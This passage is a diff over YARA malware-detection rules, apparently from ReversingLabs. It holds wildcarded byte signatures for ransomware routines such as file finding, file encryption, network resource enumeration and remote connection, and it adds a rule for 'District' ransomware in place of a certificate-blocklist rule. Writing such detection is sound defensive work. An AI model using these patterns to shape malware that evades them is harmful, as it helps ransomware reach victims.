45 ?? ?? EB ?? 66 0F BE 06 8D + 8D ?? ?? ?? ?? 0F B7 C0 50 E8 ?? ?? ?? ?? 46 3B F7 75 ?? 53 53 53 53 68 ?? ?? ?? ?? + C6 45 ?? ?? 88 5D ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 33 C0 50 + 6A ?? 50 50 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 45 ?? 85 + C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 33 C9 51 51 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? 8B F0 85 F6 74 ?? 33 C0 50 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 + ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? + 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 FF D7 FF 75 ?? FF D7 53 FF + D7 80 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8D ?? ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 81 + C5 ?? ?? ?? ?? C9 C3 8B 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ?? + 8D 95 ?? ?? ?? ?? C6 84 05 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 + ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? + E9 ?? ?? ?? ?? E8 + } + $encrypt_files_p1 = { + 66 39 03 0F 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 33 C0 8D 8D ?? + ?? ?? ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? + ?? 8D 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 0F 43 95 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5B C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 39 9D ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 8D 04 41 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? + ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 + 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 BA ?? ?? ?? ?? 8D + 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? + 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? + ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D + } + $encrypt_files_p2 = { + 8D ?? ?? ?? ?? 83 C4 ?? 3B C8 74 ?? 33 C9 88 4D ?? 8D 8D ?? ?? ?? ?? FF 75 ?? 50 E8 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? + ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 + ?? ?? ?? ?? 56 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 C0 59 89 85 ?? + ?? ?? ?? 89 8D ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 88 + 85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 45 ?? ?? 57 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 8D 4D + ?? E8 ?? ?? ?? ?? 33 C0 C6 45 ?? ?? 57 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 59 99 F7 F9 8D 4D ?? + 52 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 59 99 F7 F9 8D 8D ?? ?? ?? ?? 52 E8 ?? ?? ?? + ?? 83 EB ?? 75 ?? 8D 95 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 51 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? + ?? ?? ?? 39 9D ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? FF B5 ?? ?? + ?? ?? 0F 43 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 8D 8D ?? + ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 45 ?? + C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 + } + $encrypt_files_p3 = { + 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? + ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? + E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? + E8 ?? ?? ?? ?? 8B F3 39 B5 ?? ?? ?? ?? 76 ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8A 04 30 04 ?? 88 45 ?? FF 75 ?? E8 ?? ?? ?? + ?? 46 3B B5 ?? ?? ?? ?? 72 ?? 8B F3 39 B5 ?? ?? ?? ?? 76 ?? 83 BD ?? ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8A 04 30 2C ?? 88 45 ?? FF 75 + ?? E8 ?? ?? ?? ?? 46 3B B5 ?? ?? ?? ?? 72 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 50 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 + } + $encrypt_files_p4 = { + 85 ?? ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? BE ?? ?? + ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 56 50 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? + ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D + ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? + C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 + ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? + ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? + ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? + 59 59 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? + ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? + E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? + ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 8D + } + $encrypt_files_p5 = { + 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? + ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85 ?? ?? ?? ?? 51 50 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? + ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 50 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D + ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? + E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D + } + $encrypt_files_p6 = { + E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D + ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ?? ?? 83 + EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ?? + ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ?? + ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? + ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? + 8D 95 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 95 ?? + ?? ?? ?? 03 CA 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 2B C8 51 50 56 E8 ?? ?? ?? + ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? + 68 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ohanae" and pe.signatures[i].serial=="32:66:50:79:c5:a5:85:4a:68:33:62:3c:a7:7f:f5:ac" and 1381967999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_01A90094C83412C00Cf98Dd2Eb0D7042 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_District : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects District ransomware." author = "ReversingLabs" - id = "e5059974-9ea2-5497-a728-c21a6cdd30e4" - date = "2023-11-08" - modified = "2023-11-08" + id = "fc6abbc7-66f9-56e6-8106-5f360f25b092" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L405-L421" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5a3de0e6de5cda39e40988f9e2324cbee3e059aff5ceaf7fd819de8bf7215808" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.District.yara#L1-L194" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9ce395636fd7719f503726df82998e1ac72e9e80fd7a4534bd2251ac9283af38" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "District" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 + 24 ?? 8B F1 8D 4D ?? 50 E8 ?? ?? ?? ?? 40 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 33 C9 C7 44 + 24 ?? ?? ?? ?? ?? 50 8D 45 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 EC ?? + C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 40 C7 84 24 ?? ?? ?? + ?? ?? ?? ?? ?? 33 C9 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 51 8D 45 ?? 66 89 8C 24 ?? + ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8D + 44 24 ?? 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 40 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 33 C9 C7 44 + 24 ?? ?? ?? ?? ?? 50 8D 44 24 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 EC + ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 33 C9 C7 44 24 + ?? ?? ?? ?? ?? 50 51 8D 44 24 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? + ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 50 66 89 44 24 ?? 8D 4C 24 ?? + 8D 45 ?? C7 44 24 ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 56 8D 4C 24 ?? E8 ?? + ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 + ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? + ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 66 0F 6E C0 F3 0F E6 C0 C1 E8 ?? F2 0F 58 04 C5 + ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 56 E8 ?? ?? ?? ?? 56 8B D8 + } + $encrypt_files_p2 = { + E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 0F 1F 40 ?? 0F 1F 84 00 + ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 6A ?? A3 ?? ?? ?? ?? 8D 44 24 ?? 50 56 + 53 57 89 0D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? 56 FF 74 24 ?? 8B D3 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? F7 D8 6A + ?? 6A ?? 50 57 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 56 FF 74 24 ?? 57 FF 15 ?? ?? + ?? ?? 83 6C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 + FF 15 ?? ?? ?? ?? 83 7C 24 ?? ?? 8D 4C 24 ?? 8D 45 ?? 0F 43 4C 24 ?? 83 7D ?? ?? 51 + 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF 74 + 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 8B 44 24 ?? C7 44 + 24 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0 + C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 83 F8 ?? + 72 ?? 40 8D 4C 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 + 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24 + ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 44 24 + ?? 8B 44 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF + 74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 89 44 24 ?? 8B + 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 77 ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 + C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? + ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C2 + } + $find_files = { + 53 55 56 57 6A ?? 8B F1 E8 ?? ?? ?? ?? 83 C4 ?? 8D 9E ?? ?? ?? ?? 8B E8 53 68 ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 53 50 89 45 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D BE ?? ?? ?? + ?? 0F 1F 80 ?? ?? ?? ?? F6 03 ?? 57 74 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 75 ?? 57 E8 ?? + ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 50 8B CE E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 84 C0 74 + ?? 8B CE E8 ?? ?? ?? ?? 53 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 80 7C 24 ?? ?? 75 + ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 55 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5D + 5B C2 + } + $enum_resources_1_p1 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 55 56 57 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 + ?? 8B DA 8D 44 24 ?? 89 5C 24 ?? 50 51 6A ?? 6A ?? 6A ?? C7 44 24 ?? ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? + 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? BE ?? ?? + ?? ?? E9 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 3D + ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? + ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 ED 89 + 6C 24 ?? 39 6C 24 ?? 0F 86 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 DB 0F 8E ?? ?? ?? ?? C1 + E5 ?? 8B F3 89 6C 24 ?? 89 5C 24 ?? 0F 1F 84 00 ?? ?? ?? ?? 83 BC 2C ?? ?? ?? ?? ?? + 0F 85 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 74 ?? 8B 84 2C ?? ?? ?? ?? 66 83 78 ?? ?? 8D + 50 ?? 74 ?? 8D B4 24 ?? ?? ?? ?? 8D 48 ?? 8A 01 8D 52 ?? 88 06 8D 76 ?? 66 83 3A + } + $enum_resources_1_p2 = { + 8D 49 ?? 75 ?? 8B 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 + 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B4 2C ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? + ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? FF 70 ?? 8B 40 ?? 83 E0 ?? 50 8D 84 24 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? C6 44 24 ?? ?? 8B 56 ?? + F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 + A1 ?? ?? ?? ?? 66 89 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 0F 1F 44 00 ?? 8A 41 ?? 8D + 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? + 88 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 0F 1F 00 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? + ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? + 88 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? + 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 66 0F 1F 44 00 ?? + 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F6 + } + $enum_resources_1_p3 = { + C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? + ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F6 C2 ?? 74 ?? 8D + 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 + 89 41 ?? 84 D2 79 ?? 8D 4C 24 ?? 49 0F 1F 40 ?? 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? + ?? ?? ?? 89 01 A1 